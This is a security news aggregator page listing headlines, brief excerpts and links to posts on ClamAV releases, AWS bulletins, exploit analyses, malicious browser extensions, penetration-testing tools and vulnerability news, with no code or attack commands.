The ClamAV 1.3.0 feature release is now stable!Today, we are also publishing the 1.2.2 and 1.0.5 security patch versions. ClamAV 1.1 is past EOL for security fixes and will not receive an update. Switch to the 1.0 LTS, 1.2, or 1.3 versions for continued support.The release files are available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub*:Alpine-based imagesDebian-based multi-arch images*The Docker images are built on release day and may not be available until later in the day.Continue reading to learn what changed in each version.1.3.0ClamAV 1.3.0 includes the following improvements and changes:Major changesAdded support for extracting and scanning attachments found in Microsoft OneNote section files. OneNote parsing will be enabled by default,...
http://blog.clamav.net/2023/11/clamav-130-122-105-released.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2024-21626 - Runc container issue
Publication Date: 2024/01/31 1:30 PM PST CVE Identifier: CVE-2024-21626 AWS is aware of a recently disclosed security issue affecting the runc component of several open source container management systems (CVE-2024-21626). With the exception of the AWS services listed below, no customer action is required to address this issue. Amazon Linux An updated version of runc is available for Amazon Linux 1 (runc-1.1.11-1.0.amzn1), Amazon Linux 2 (runc-1.1.11-1.amzn2) and for Amazon Linux 2023 (runc-1.1.11-1.amzn2023). AWS recommends that customers using runc or other container-related software apply those updates or a newer version. Further information is available in the Amazon Linux Security Center. Bottlerocket OS An updated version of runc will be included in Bottlerocket 1.19.0, which will...
https://aws.amazon.com/security/security-bulletins/AWS-2024-001/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.3.0 Second Release Candidate now available!
We are excited to announce the ClamAV 1.3.0 release candidate.You can find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page.Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc2.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies.For Docker users, there is no specific Docker tag for the release candidate, but you can use these tags:clamav/clamav:unstableclamav/clamav:unstable_base clamav/clamav-debian:unstableclamav/clamav-debian:unstable_base This...
http://blog.clamav.net/2024/01/clamav-130-second-release-candidate-now.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV Debian multi-Arch Docker images now available!
We now offer official ClamAV docker images based on `debian:11-slim`.In addition to offering an alternative to the original Alpine Linux images, the new images are multi-arch images supporting `linux/amd64`, `linux/arm64`, and `linux/ppc64le`.ClamAV's Alpine-based and Debian-based Docker images are now built weekly to pick up security fixes in the base images. Check it out here.
http://blog.clamav.net/2024/01/clamav-debian-multi-arch-docker-images.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to Recover an Unsaved Excel File
If your Excel file was left unsaved by accident, don’t fret – Microsoft understands mistakes happen and provides built-in functionality to help recover it. To recover an unsaved file, navigate... The post How to Recover an Unsaved Excel File appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-recover-unsaved-excel-file/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Best EDR Of The Market (BEOTM) – Endpoint Detection and Response Testing Tool
BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) tool designed to serve as a testing ground
https://www.darknet.org.uk/2024/01/best-edr-of-the-market-beotm-endpoint-detection-and-response-testing-tool/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Silly EDR Bypasses and Where To Find Them
Abusing exception handlers to hook and bypass user mode EDR hooks.
https://malwaretech.com/2023/12/silly-edr-bypasses-and-where-to-find-them.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

An Introduction to Bypassing User Mode EDR Hooks
Understanding the basics of user mode EDR hooking, common bypass techniques, and their limitations.
https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.3.0 release candidate now available!
The ClamAV 1.3.0 release candidate is now available.You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page.Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc.tar.gz" does not require an internet connection to build. All dependencies are included in this package.  But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies.For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags.The release candidate phase is expected...
http://blog.clamav.net/2023/12/clamav-130-release-candidate-now.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

First handset with MTE on the market
By Mark Brand, Google Project ZeroIntroduction It's finally time for me to fulfill a long-standing promise. Since I first heard about ARM's Memory Tagging Extensions, I've said (to far too many people at this point to be able to back out…) that I'd immediately switch to the first available device that supported this feature. It's been a long wait (since late 2017) but with the release of the new Pixel 8 / Pixel 8 Pro handsets, there's finally a production handset that allows you to enable MTE! The ability of MTE to detect memory corruption exploitation at the first dangerous access is a significant improvement in diagnostic and potential security effectiveness. The availability of MTE on a production handset for the first time is a big step forward, and I think there's...
https://googleprojectzero.blogspot.com/2023/11/first-handset-with-mte-on-market.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.2.1, 1.1.3, 1.0.4, 0.103.11 patch versions published
Today, we are publishing the 1.2.1, 1.1.3, 1.0.4, and 0.103.11 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. Continue reading to learn what changed in each version.1.2.1ClamAV 1.2.1 is a patch release with the following fixes:Eliminate security warning about unused "atty" dependency.GitHub pull request.Upgrade the bundled UnRAR library (libclamunrar) to version 6.2.12.GitHub pull request.Build system: Fix link error with Clang/LLVM/LLD version 17. Patch courtesy of Yasuhiro Kimura.GitHub pull request.Fix alert-exceeds-max feature for files > 2GB and < max-filesize.GitHub pull request. Special thanks to Yasuhiro Kimura for code contributions and bug reports.1.1.3ClamAV...
http://blog.clamav.net/2023/10/clamav-121-113-104-010311-patch.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Implementing a “Share on Mastodon” button for a blog
I decided that I would make it easier for people to share my articles on social media, most importantly on Mastodon. However, my Hugo theme didn't support showing a “Share on Mastodon” button yet. It wasn't entirely trivial to add support either: unlike with centralized solutions like Facebook where a simple link is sufficient, here one would need to choose their home instance first. As far as existing solutions go, the only reasonably sophisticated approach appears to be Share₂Fedi. It works nicely, privacy-wise one could do better however. So I ended up implementing my own solution while also generalizing that solution to support a variety of different Fediverse applications in addition to Mastodon. Contents Why not Share₂Fedi? Share on Mastodon or on Fediverse? ...
https://palant.info/2023/10/19/implementing-a-share-on-mastodon-button-for-a-blog/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

An analysis of an in-the-wild iOS Safari WebContent to GPU Process exploit
By Ian Beer A graph representation of the sandbox escape NSExpression payload In April this year Google's Threat Analysis Group, in collaboration with Amnesty International, discovered an in-the-wild iPhone zero-day exploit chain being used in targeted attacks delivered via malicious link. The chain was reported to Apple under a 7-day disclosure deadline and Apple released iOS 16.4.1 on April 7, 2023 fixing CVE-2023-28206 and CVE-2023-28205. Over the last few years Apple has been hardening the Safari WebContent (or "renderer") process sandbox attack surface on iOS, recently removing the ability for the WebContent process to access GPU-related hardware directly. Access to graphics-related drivers is now brokered via a GPU process which runs in a separate sandbox. ...
https://googleprojectzero.blogspot.com/2023/10/an-analysis-of-an-in-the-wild-ios-safari-sandbox-escape.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

It might Be Time to Rethink Phishing Awareness
Phishing awareness can be a powerful security tool, or a complete disaster. It all hinges on how you implement it.
https://malwaretech.com/2023/09/it-might-be-time-to-rethink-phishing-awareness.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Analyzing a Modern In-the-wild Android Exploit
By Seth Jenkins, Project ZeroIntroductionIn December 2022, Google's Threat Analysis Group (TAG) discovered an in-the-wild exploit chain targeting Samsung Android devices. TAG's blog post covers the targeting and the actor behind the campaign. This is a technical analysis of the final stage of one of the exploit chains, specifically CVE-2023-0266 (a 0-day in the ALSA compatibility layer) and CVE-2023-26083 (a 0-day in the Mali GPU driver) as well as the techniques used by the attacker to gain kernel arbitrary read/write access.Notably, several of the previous stages of the exploit chain used n-day vulnerabilities:CVE-2022-4262, a 0-day vulnerability in Chrome was exploited in the Samsung browser to achieve RCE.CVE-2022-3038, a Chrome n-day that unpatched in the Samsung browser, was used...
https://googleprojectzero.blogspot.com/2023/09/analyzing-modern-in-wild-android-exploit.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A year after the disastrous breach, LastPass has not improved
In September last year, a breach at LastPass' parent company GoTo (formerly LogMeIn) culminated in attackers siphoning out all data from their servers. The criticism from the security community has been massive. This was not so much because of the breach itself, such things happen, but because of the many obvious ways in which LastPass made matters worse: taking months to notify users, failing to provide useful mitigation instructions, downplaying the severity of the attack, ignoring technical issues which have been publicized years ago and made the attackers' job much easier. The list goes on. Now this has been almost a year ago. LastPass promised to improve, both as far as their communication goes and on the technical side of things. So let's take a look at whether they managed to...
https://palant.info/2023/09/05/a-year-after-the-disastrous-breach-lastpass-has-not-improved/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AgentSmith HIDS – Host Based Intrusion Detection
AgentSmith HIDS is a powerful component of a Host-based Intrusion Detection system, it has anti-rootkit functionalities and is a very performant way to collect information about a host.
https://www.darknet.org.uk/2023/08/agentsmith-hids-host-based-intrusion-detection/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Chrome Sync privacy is still very bad
Five years ago I wrote an article about the shortcomings of Chrome Sync (as well as a minor issue with Firefox Sync). Now Chrome Sync has seen many improvements since then. So time seems right for me to revisit it and to see whether it respects your privacy now. Spoiler: No, it doesn't. It improved, but that's an improvement from outright horrible to merely very bad. The good news: today you can use Chrome Sync in a way that preserves your privacy. Google however isn't interested in helping you figure out how to do it. Contents The default flow The privacy-preserving flow What does Google do with your data? It could have been worse Comparison to Firefox Sync The default flow Chrome Sync isn't some obscure feature of Google Chrome. In fact, as of Chrome...
https://palant.info/2023/08/29/chrome-sync-privacy-is-still-very-bad/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.2.0 feature version and 1.1.2, 1.0.3, 0.103.10 patch versions published
The ClamAV 1.2.0 feature release is now stable and available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub.Today, we are also publishing the 1.1.2, 1.0.3, and 0.103.10 security patch versions. You may be surprised about the impromptu patch release. Indeed, we just published patch versions earlier this month. Unfortunately, a recent CVE for the UnRAR* library has prompted us to prepare these additional updates. We strongly encourage everyone to upgrade to one of these versions. The release files for the patch versions are also available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub. Because ClamAV 1.2.0 is now the latest release, the release files for version 1.1.2 will be found under the...
http://blog.clamav.net/2023/08/clamav-120-feature-version-and-111-102.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.1.1, 1.0.2, 0.103.9 patch versions published
Today, we are releasing the following critical patch versions for ClamAV: 1.1.1 1.0.2 0.103.9  ClamAV 0.105 and 0.104 have reached end-of-life according to the ClamAV's End of Life (EOL) policy and will not be patched.The release files are available for download on ClamAV.net, on the Github Release page, and through Docker Hub.Note: We observed an issue building ClamAV on Windows using the recently released libjson-c version 0.17. If you are building ClamAV for Windows, you should use libjson-c version 0.16 or prior. 1.1.1 ClamAV 1.1.1 is a critical patch release with the following fixes: CVE-2023-20197 Fixed a possible denial of service vulnerability in the HFS+ file parser. This issue affects versions 1.1.0, 1.0.1 through 1.0.0, 0.105.2 through 0.105.0,...
http://blog.clamav.net/2023/07/2023-08-16-releases.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

MTE As Implemented, Part 1: Implementation Testing
By Mark Brand, Project ZeroBackground In 2018, in the v8.5a version of the ARM architecture, ARM proposed a hardware implementation of tagged memory, referred to as MTE (Memory Tagging Extensions). Through mid-2022 and early 2023, Project Zero had access to pre-production hardware implementing this instruction set extension to evaluate the security properties of the implementation. In particular, we're interested in whether it's possible to use this instruction set extension to implement effective security mitigations, or whether its use is limited to debugging/fault detection purposes. As of the v8.5a specification, MTE can operate in two distinct modes, which are switched between on a per-thread basis. The first mode is sync-MTE, where tag-check failure on a memory access will...
https://googleprojectzero.blogspot.com/2023/08/mte-as-implemented-part-1.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Why browser extension games need access to all websites
When installing browser extensions in Google Chrome, you are asked to confirm the extension's permissions. In theory, this is supposed to allow assessing the risk associated with an extension. In reality however, users typically lack the knowledge to properly interpret this prompt. For example, I've often seen users accusing extension developers of spying just because the prompt says they could. On the other hand, people will often accept these cryptic prompts without thinking twice. They expect the browser vendors to keep them out of harm's way, trust that isn't always justified [1] [2] [3]. The most extreme scenario here is casual games not interacting with the web at all, yet requesting access to all websites. I found a number of extensions that will abuse this power to hijack...
https://palant.info/2023/06/14/why-browser-extension-games-need-access-to-all-websites/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Another cluster of potentially malicious Chrome extensions
We've already seen Chrome extensions containing obfuscated malicious code. We've also seen PCVARK's malicious ad blockers. When looking for more PCVARK extensions, I stumbled upon an inconspicuous extension called “Translator - Select to Translate.” The only unusual thing about it were its reviews, lots of raving positive reviews mixed with usability complains. That, and the permissions: why does a translator extension need webRequest and webRequestBlocking permissions? When I looked into this extension, I immediately discovered a strange code block. Supposedly, it was buggy locale processing. In reality, it turned out to be an obfuscated malicious logic meant to perform affiliate fraud. That extension wasn't alone. I kept finding similar extensions until I had a list of 109 extensions,...
https://palant.info/2023/06/08/another-cluster-of-potentially-malicious-chrome-extensions/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Introducing PCVARK and their malicious ad blockers
It isn't news that the overwhelming majority of ad blockers in Chrome Web Store is either outright malicious or waiting to accumulate users before turning malicious. So it wasn't a surprise that the very first ad blocker I chose semi-randomly (Adblock Web with 700,000 users) turned out malicious. Starting from it, I found another malicious extension (Ad-Blocker, 700,000 users) and two more that have been removed from Chrome Web Store a year ago (BitSafe Adblocker and Adblocker Unlimited). All these ad blockers and probably some more were developed by the company PCVARK. According to Malwarebytes Labs, this company specializes in developing “potentially unwanted programs.” In other words: they show users warnings about alleged compromise, only to push them into installing their software....
https://palant.info/2023/06/05/introducing-pcvark-and-their-malicious-ad-blockers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

padre – Padding Oracle Attack Exploiter Tool
padre is an advanced exploiter and Padding Oracle attack tool that can be deployed against CBC mode encryption.
https://www.darknet.org.uk/2023/05/padre-padding-oracle-attack-exploiter-tool/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Issue With IAM Supporting Multiple MFA Devices
Initial Publication Date: 04/25/2023 10:00AM EST A security researcher recently reported an issue with AWS's recently-released (November 16th, 2022) support for multiple multi-factor authentication (MFA) devices for IAM user principals. The reported issue could have potentially arisen only when the following three conditions were met: (1) An IAM user had possession of long-term access key (AK)/secret key (SK) credentials, (2) that IAM user had the privilege to add an MFA to their own identity without using an MFA, and (3) that IAM user's overall access privileges beyond console sign-in had been configured by an administrator to be greater after adding the MFA. Under those narrow conditions, possession of AK/SK alone was equivalent to possession of AK/SK and a previously configured MFA....
https://aws.amazon.com/security/security-bulletins/AWS-2023-001/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Privacy Implications of Web 3.0 and Darknets
The evolution of the internet has been rapid over the years and has impacted the privacy implications of Web 3.0 and Darknets
https://www.darknet.org.uk/2023/03/privacy-implications-of-web-3-0-and-darknets/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DataSurgeon – Extract Sensitive Information (PII) From Logs
DataSurgeon (ds) is a versatile tool designed to Extract Sensitive Information (PII) From Logs, it's intended to be used for incident response, penetration testing, and CTF challenges.
https://www.darknet.org.uk/2023/03/datasurgeon-extract-sensitive-information-pii-from-logs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

We're going teetotal: It's goodbye to The Daily Swig
PortSwigger today announces that The Daily Swig is closing down
https://portswigger.net/daily-swig/were-going-teetotal-its-goodbye-to-the-daily-swig
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bug Bounty Radar // The latest bug bounty programs for March 2023
New web targets for the discerning hacker
https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-march-2023
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Indian transport ministry flaws potentially allowed creation of counterfeit driving licenses
Armed with personal data fragments, a researcher could also access 185 million citizens' PII
https://portswigger.net/daily-swig/indian-transport-ministry-flaws-potentially-allowed-creation-of-counterfeit-driving-licenses
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Password managers: A rough guide to enterprise secret platforms
The second part of our password manager series looks at business-grade tech to handle API tokens, login credentials, and more
https://portswigger.net/daily-swig/password-managers-a-rough-guide-to-enterprise-secret-platforms
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Chromium bug allowed SameSite cookie bypass on Android devices
Protections against cross-site request forgery could be bypassed
https://portswigger.net/daily-swig/chromium-bug-allowed-samesite-cookie-bypass-on-android-devices
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Deserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption
Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news
https://portswigger.net/daily-swig/deserialized-web-security-roundup-twitter-2fa-backlash-godaddy-suffers-years-long-attack-campaign-and-xss-hunter-adds-e2e-encryption
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

NIST plots biggest ever reform of Cybersecurity Framework
CSF 2.0 blueprint offered up for public review
https://portswigger.net/daily-swig/nist-plots-biggest-ever-reform-of-cybersecurity-framework
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cisco ClamAV anti-malware scanner vulnerable to serious security flaw
Patch released for bug that poses a critical risk to vulnerable technologies
https://portswigger.net/daily-swig/cisco-clamav-anti-malware-scanner-vulnerable-to-serious-security-flaw
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVSS system criticized for failure to address real-world impact
JFrog argues vulnerability risk metrics need complete revamp
https://portswigger.net/daily-swig/cvss-system-criticized-for-failure-to-address-real-world-impact
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Realistic Look at Implications of ChatGPT for Cybercrime
Analyzing ChatGPT's capabilities and various claims about how it will revolutionize cybercrime.
https://malwaretech.com/2023/02/a-realistic-look-at-chatgpt-cybercrime.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

‘Most web API flaws are missed by standard security tests' – Corey J Ball on securing a neglected attack vector
API security is a ‘great gateway' into a pen testing career, advises specialist in the field
https://portswigger.net/daily-swig/most-web-api-flaws-are-missed-by-standard-security-tests-corey-j-ball-on-securing-a-neglected-attack-vector
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HTTP request smuggling bug patched in HAProxy
Exploitation could enable attackers to access backend servers
https://portswigger.net/daily-swig/http-request-smuggling-bug-patched-in-haproxy
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Belgium launches nationwide safe harbor for ethical hackers
New legal protections for security researchers could be the strongest of any EU country
https://portswigger.net/daily-swig/belgium-launches-nationwide-safe-harbor-for-ethical-hackers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Pwnagotchi – Maximize Crackable WPA Key Material For Bettercap
Pwnagotchi is an A2C-based "AI" leveraging bettercap that learns from its surrounding WiFi environment to maximize crackable WPA key material it captures
https://www.darknet.org.uk/2023/02/pwnagotchi-maximize-crackable-wpa-key-material-for-bettercap/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Lessons Learned from Cybersecurity Mentoring
I suppose one could say that I’ve been doing this far too long, and I’ve gained some knowledge about how the cybersecurity industry works, and how people succeed or fail at the field. To give back to newcomers, I recently opened up a Calendly to do ad hoc career mentoring, in addition to the career… Read More Lessons Learned from Cybersecurity Mentoring
https://tisiphone.net/2023/01/03/lessons-learned-from-cybersecurity-mentoring/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HardCIDR – Network CIDR and Range Discovery Tool
HardCIDR is a Linux Bash script to discover the netblocks, or ranges, (in CIDR notation) owned by the target organization during the intelligence gathering phase of a penetration test.
https://www.darknet.org.uk/2022/12/hardcidr-network-cidr-and-range-discovery-tool/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

TikTok is a National Security Risk, Not A Privacy One
An analysis of the threat posed by TikTok and why we need to weigh our options carefully.
https://malwaretech.com/2022/12/tiktok-is-a-national-security-risk.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Career Counseling Office Hours!
I now have some limited appointments for career counseling and resume discussion open for sign-ups. These sessions are free for college students and current enlisted military, and tip-what-you can for everyone else, if you feel my help was meaningful. You can sign up here: https://calendly.com/lesleycarhart Keep in mind that I can only review North American… Read More Career Counseling Office Hours!
https://tisiphone.net/2022/12/05/career-counseling-office-hours/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

I've Moved to Mastodon!
Hi friends! I hope you’re having a wonderful Thanksgiving weekend (for the US folks), or a nice weekend regardless of location. I just wanted to drop a quick note to let you all know that from now on the best way to follow my daily social media posts, which include Q&As, cybersecurity news, and news… Read More I’ve Moved to Mastodon!
https://tisiphone.net/2022/11/26/ive-moved-to-mastodon/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Podcast: Securing Bridges | A Live Stream Podcast With Alyssa Miller | Guest: Lesley Carhart | Episode 28
Via: https://www.itspmagazine.com/securing-bridges-podcast
https://tisiphone.net/2022/11/13/podcast-securing-bridges-a-live-stream-podcast-with-alyssa-miller-guest-lesley-carhart-episode-28/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Infosec Mastodon Lists!
Hi pals! I hear you like lists as folks migrate over to Mastodon. Here are some I will keep relatively updated you may find useful, just to track people down! If you want me to remove you for some reason, contact me by DM or email. You can import these lists in your Mastodon preferences… Read More Infosec Mastodon Lists!
https://tisiphone.net/2022/11/10/infosec-mastodon-lists/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786)

https://malwaretech.com/2022/11/everything-you-need-to-know-about-the-openssl-3-0-7-patch.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
On Tuesday, November 1 2022 between 1300-1700 UTC, the OpenSSL project announced the release of a new version of OpenSSL (version 3.0.7) that will patch a critical vulnerability in OpenSSL version 3.0 and above. Only OpenSSL versions between 3.0 and 3.0.6 are affected at the time of writing. At this moment the details of this [...] The post CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/general-tutorials/openssl-3-0-7-patches-critical-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

(Podcast) ITSP – Martial Arts, Marksmanship, And ICS Cyber Incident Response | A Conversation With Lesley Carhart
https://itspmagazinepodcast.com/episodes/martial-arts-marksmanship-and-ics-cyber-incident-response-a-conversation-with-lesley-carhart-cy-beat-podcast-with-deb-radcliff-2dWkd8yh
https://tisiphone.net/2022/10/10/podcast-itsp-martial-arts-marksmanship-and-ics-cyber-incident-response-a-conversation-with-lesley-carhart/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ASIS Article – Preparing for OT Incident Response
https://www.asisonline.org/security-management-magazine/monthly-issues/security-technology/archive/2022/october/Your-Cyber-Response-Plan-Needs-These-6-Components/ Cybersecurity incidents are no longer a matter of if, but when. Building a good strategy and architecture to deter intrusions is incredibly important in reducing the frequency and severity of incidents, but there is no scenario where any organization is totally immune. That means that every organization must have a plan for what they… Read More ASIS Article – Preparing for OT Incident Response
https://tisiphone.net/2022/10/10/asis-article-preparing-for-ot-incident-response/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Student Loan Breach Exposes 2.5M Records
2.5 million people were affected, in a breach that could spell more trouble down the line.
https://threatpost.com/student-loan-breach-exposes-2-5m-records/180492/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Watering Hole Attacks Push ScanBox Keylogger
Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.
https://threatpost.com/watering-hole-attacks-push-scanbox-keylogger/180490/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Tentacles of ‘0ktapus' Threat Group Victimize 130 Firms
Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.
https://threatpost.com/0ktapus-victimize-130-firms/180487/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ransomware Attacks are on the Rise
Lockbit is by far this summer's most prolific ransomware group, trailed by two offshoots of the Conti group.
https://threatpost.com/ransomware-attacks-are-on-the-rise/180481/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybercriminals Are Selling Access to Chinese Surveillance Cameras
Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.
https://threatpost.com/cybercriminals-are-selling-access-to-chinese-surveillance-cameras/180478/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Twitter Whistleblower Complaint: The TL;DR Version
Twitter is blasted for security and privacy lapses by the company's former head of security who alleges the social media giant's actions amount to a national security risk.
https://threatpost.com/twitter-whistleblower-tldr-version/180472/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Firewall Bug Under Active Attack Triggers CISA Warning
CISA is warning that Palo Alto Networks' PAN-OS is under active attack and needs to be patched ASAP.
https://threatpost.com/firewall-bug-under-active-attack-cisa-warning/180467/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fake Reservation Links Prey on Weary Travelers
Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.
https://threatpost.com/reservation-links-prey-on-travelers/180462/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

iPhone Users Urged to Update to Patch 2 Zero-Days
Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.
https://threatpost.com/iphone-users-urged-to-update-to-patch-2-zero-days-under-attack/180448/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Google Patches Chrome's Fifth Zero-Day of the Year
An insufficient validation input flaw, one of 11 patched in an update this week, could allow for arbitrary code execution and is under active attack.
https://threatpost.com/google-patches-chromes-fifth-zero-day-of-the-year/180432/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

[Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1)

https://malwaretech.com/2022/05/video-introduction-to-use-after-free-vulnerabilities-userafterfree-challenge-walkthrough-part-1.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Socialscan – Command-Line Tool To Check For Email And Social Media Username Usage
socialscan is an accurate command-line tool to check For email and social media username usage on online platforms, given an email address or username, socialscan returns whether it is available, taken or invalid on online platforms. Other similar tools check username availability by requesting the profile page of the username in question and based on […]
https://www.darknet.org.uk/2022/04/socialscan-command-line-tool-to-check-for-email-and-social-media-username-usage/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

[Video] Exploiting Windows RPC – CVE-2022-26809 Explained | Patch Analysis

https://malwaretech.com/2022/04/video-exploiting-windows-rpc-cve-2022-26809-explained-patch-analysis.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CFRipper – CloudFormation Security Scanning & Audit Tool
CFRipper is a Python-based Library and CLI security analyzer that functions as an AWS CloudFormation security scanning and audit tool, it aims to prevent vulnerabilities from getting to production infrastructure through vulnerable CloudFormation scripts. You can use CFRipper to prevent deploying insecure AWS resources into your Cloud environment. You can write your own compliance checks […]
https://www.darknet.org.uk/2022/01/cfripper-cloudformation-security-scanning-audit-tool/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Installing Rogue-jndi on Kali Linux
Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example) in response to the forged [...] The post Installing Rogue-jndi on Kali Linux appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/general-tutorials/installing-rogue-jndi-on-kali-linux/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CredNinja – Test Credential Validity of Dumped Credentials or Hashes
CredNinja is a tool to quickly test credential validity of dumped credentials (or hashes) across an entire network or domain very efficiently. At the core of it, you provide it with a list of credentials you have dumped (or hashes, it can pass-the-hash) and a list of systems on the domain (the author suggests scanning […]
https://www.darknet.org.uk/2022/01/credninja-test-credential-validity-of-dumped-credentials-or-hashes/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Log4Shell VMware vCenter Server (CVE-2021-44228)
Log4Shell is a critical vulnerability with the highest possible CVSSv3 score of 10.0 that affects thousands of products running Apache Log4j and leaves millions of targets potentially vulnerable. CVE-2021-44228 affects log4j versions 2.0-beta9 to 2.14.1. Log4j is an incredibly popular logging library used in many different products and various Apache frameworks like Struts2, Kafka, and [...] The post Log4Shell VMware vCenter Server (CVE-2021-44228) appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/log4shell-vmware-vcenter-server-cve-2021-44228/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to customize behavior of AWS Managed Rules for AWS WAF
AWS Managed Rules for AWS WAF provides a group of rules created by AWS that can be used help protect you against common application vulnerabilities and other unwanted access to your systems without having to write your own rules. AWS Threat Research Team updates AWS Managed Rules to respond to an ever-changing threat landscape in order […]
https://aws.amazon.com/blogs/security/how-to-customize-behavior-of-aws-managed-rules-for-aws-waf/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
